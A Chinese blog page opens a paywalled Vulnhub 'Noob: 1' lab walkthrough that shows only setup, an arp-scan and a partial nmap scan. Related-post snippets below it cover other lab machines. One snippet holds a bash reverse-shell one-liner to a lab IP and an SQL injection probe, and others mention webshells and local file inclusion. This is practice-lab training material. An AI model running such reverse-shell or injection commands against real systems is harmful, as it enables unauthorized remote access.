Vulnhub Noob: 1靶机攻击实战(一)

原创 于 2025-07-22 16:08:53 发布 · 991 阅读 · 8 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#渗透测试 #网络安全

导语
  先搭建vulnhub靶机:https://www.vulnhub.com/entry/noob-1,746/ 。下载镜像之后Noob.ova后,用VMware Workstation Pro打开依次点击文件-打开,选择我们刚才下载的ova文件打开,修改虚拟机名称及存储路径并导入。

信息收集

  安装靶机成功之后,接下来需要采集相关的服务器靶机信息,我们可以通过arp-scan扫描当前网络

arp-scan -l

在这里插入图片描述
  这样我们就得到了靶机的地址。192.168.1.6。
  接下来,我们就通过namp工具来找到靶机上的端口开放情况,如下所示。

┌──(root㉿kali)-[~]
└─# nmap -sV -sS -p- 192.168.1.6
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-07-20 23:51 EDT
Nmap scan report for redrocks.win (192.168.1.6)
Host is up (0.0028s latency).
Not shown: 65532 closed tcp ports (reset)
PORT      STATE SERVICE VERSION
21/tcp    open  ftp     vsftpd 3.0.3
80
最低0.47元/天 解锁文章
靶机实战-DC-6
滕财然的博客
03-03 992
DC-6靶机实战 文章目录DC-6靶机实战1、主机发现2、端口及端口详细信息扫描3、老规矩,访问web服务(80端口)4、提权 1、主机发现 2、端口及端口详细信息扫描 开放22、80端口 3、老规矩,访问web服务(80端口) 输入IP之后会变成http://wordy且找不到此网站 和以前样,添加到hosts文件中//物理机和kali都添加 重新访问://这里我用的是火狐的款插件...
靶机实战-zico
滕财然的博客
01-19 1333
zico靶机实战 1、主机发现 netdiscover: -i 指定网卡 -r 指定网段 2、端口扫描 目标开放了44929,22,111,80端口 3、扫描端口详细信息 22-ssh,80-http,111-rpcbind,44929-status 老规矩,干80端口 4、渗透80端口(http服务) 点击页面上可点击的按钮,找到个有用的: 链接后面有?page= tools.htm...
靶机实战-Acid
滕财然的博客
01-26 978
Acid靶机实战 文章目录Acid靶机实战1、主机发现2、端口扫描3、端口详细信息扫描4、访问8080端口5、访问33447端口6、提权 1、主机发现 目标主机:192.168.232.160 我是用arp命令扫的,大家可自行选择 2、端口扫描 3、端口详细信息扫描 4、访问8080端口 只有个文件,点击就会下载,先pass 5、访问33447端口 查看网页源代码: 发现16进制...
靶机实战(billu)
weixin_45605313的博客
06-01 734
billu实验环境实验过程信息收集主机发现端口扫描目录扫描漏洞发现漏洞利用提权总结 实验环境 靶机:billu 测试机:kali,win10 实验过程 信息收集 主机发现 靶机ip:192.168.238.157 端口扫描 端口:80 常见web漏洞 22 弱口令爆破 目录扫描 主页面:提示是有sql注入的 mysql后台登陆页面 漏洞发现 test 页面发现任意文件下载 找到phpmyadmin的配置文件var/www/phpmy/config.inc.php尝试(ssh,数据库
靶机实战-FristiLeaks
滕财然的博客
01-20 538
FristiLeaks靶机实战 文章目录FristiLeaks靶机实战1、主机发现2、端口扫描3、扫描端口详细信息4、访问http服务(80端口)5、获取反弹shell6、提权 1、主机发现 netdiscover -i eth0 -r 192.168.232.0/24 双网卡,147或148都可以用 2、端口扫描 masscan --rate=100000 -p 0-65535 192.168...
vulnhub——Noob:1靶机
Re1_zf的博客
11-27 1825
本次靶机比较简单,没有什么很绕的思路 主要就是工具利用——steghide和base64解码 和个新的提权方式——nano提权
vulnhub-Noob 1靶机
m0_74631795的博客
08-12 1064
kali虚拟机Noob 1靶机(两台虚拟机均采用桥接模式)
vulnhub靶场合集之NOOB: 1靶场渗透
weixin_62297109的博客
06-04 1286
今天继续做靶场渗透,上午做了个中难度的靶场,便秘啊。。
Vulnhub靶场】NOOB: 1
DG_s1mple
03-19 3407
环境准备 下载靶机导入到vmware 攻击机IP地址:192.168.2.16 靶机ip地址:192.168.2.15 信息收集 ftp服务 我们使用nmap扫描靶机,看看它开放的服务信息 开放了ftp,http跟ssh这三个服务,我们首先用匿名用户访问靶机的ftp 有两个文件,我们下载下来分别查看下 第个是base64编码过的,我们把它解码可以得到串账号密码 第二个文件就没有什么有用的信息了 web服务 我们访问下他的网站,是个可登录的页面 除此之外,并没有什么发现 渗透开
靶机实战:Funbox10
CHAsichuan的博客
06-14 2446
次中等难度的靶机超详细版记录
CTF6靶机实战.zip
05-25
CTF6靶机实战包括三部分: 1靶机实战过程 2)文件上传的反弹shell文件(shell.php) 3)系统版本漏洞需要的文件(8478.sh)
靶机实战-evilscience
滕财然的博客
01-28 839
evilscience靶机实战 文章目录evilscience靶机实战1、主机发现2、端口扫描3、端口详情扫描4、访问80端口5、提权方法方法二 1、主机发现 目标IP:192.168.232.164 2、端口扫描 3、端口详情扫描 22端口–ssh、80端口–http 4、访问80端口 浏览网站,寻找有价值的信息 发现该网站有可能存在LFI(本地文件包含) 在about.php页面看...
靶机实战-blogger
ST0new的博客
04-05 4162
位Web 开发人员 James M Brunner 最近创建了个博客网站。他雇佣你来测试他博客网站的安全性。
靶机渗透测试实战)——熟悉渗透测试流程的简单测试
热门推荐
橘子女侠
05-09 1万+
本篇文章不注重于渗透测试,而在于将之前学习过的方法加以熟悉; 1. 实验环境 靶机:CentOS 6.7,IP地址为:192.168.37.137 攻击机:Kali,IP地址为:192.168.37.131 运行环境:VMware 2. 实验步骤 信息收集 (1)查询攻击机Kali的IP地址; (2)识别存活的主机,发现攻击的目标 (注:二、三、四层发现的目的都是识别...
vulnhub-CTF4靶机实战
御七彩虹猫
04-26 3551
Vulnhub-CTF4靶机实战
VulnHub-DarkHole_2靶机实战(超详细保姆级教程)
精品博客,你值得一看~
08-13 8489
记得我们查看过9999端口运行的程序,当我们看到源代码的内容时,我们看到这允许远程命令执行。bash -c ‘bash -i >& /dev/tcp/192.168.184.156/9001 0>&1’ #记得修改你的IP。id=1' and 1=2 --+ #页面信息消失,说明id的闭合为单引号。到此,我们就可以进行ssh连接了.下面是拓展工具注入的方式.着急看结果的宝宝们可以直接移步下面的ssh连接步骤.
Vulnhub napping-1.0.1靶机攻击实战()
最新发布
初学者
02-08 969
到这里,就算获得了root的权限了,那么这里有人会问,为什么我们拿到了daniel用户的权限,不直接通过这个用户提权反而是要通过adrian用户建立反射shell进行提权呢?这个问题有兴趣的读者可以深入研究下。
红日安全靶机实战
qq_41891666的博客
08-07 6576
0x01 入侵web服务器 0x 1.1 信息收集 首先使用 nmap 来扫描ip 段存活的主机 nmap -sn 192.168.127.0/24 这里网上有的用 netdiscover 来扫描,其实和 nmap -sn 扫描原理是样的,都是通过arp 来实现扫描。 然后接着nmap 激进模式扫端口: nmap -A -T4 192.168.127.154 发现80端口,浏览器访问,发现是phpStudy 搭建的环境,而且网站根路径是C:/php/WWW: 0x 1.2 写webshell
靶机实战-peixun-sever
滕财然的博客
01-25 460
peixun-sever靶机实战 文章目录peixun-sever靶机实战1、主机发现2、端口扫描3、端口详细信息扫描4、访问http服务(80端口)5、提权 1、主机发现 目标IP:192.168.232.135 2、端口扫描 开放22、80、8080端口 3、端口详细信息扫描 4、访问http服务(80端口) 熟悉的id=…试试有没有SQL注入 说明存在SQL注入,尝试SQL注入:...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

nihui123

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值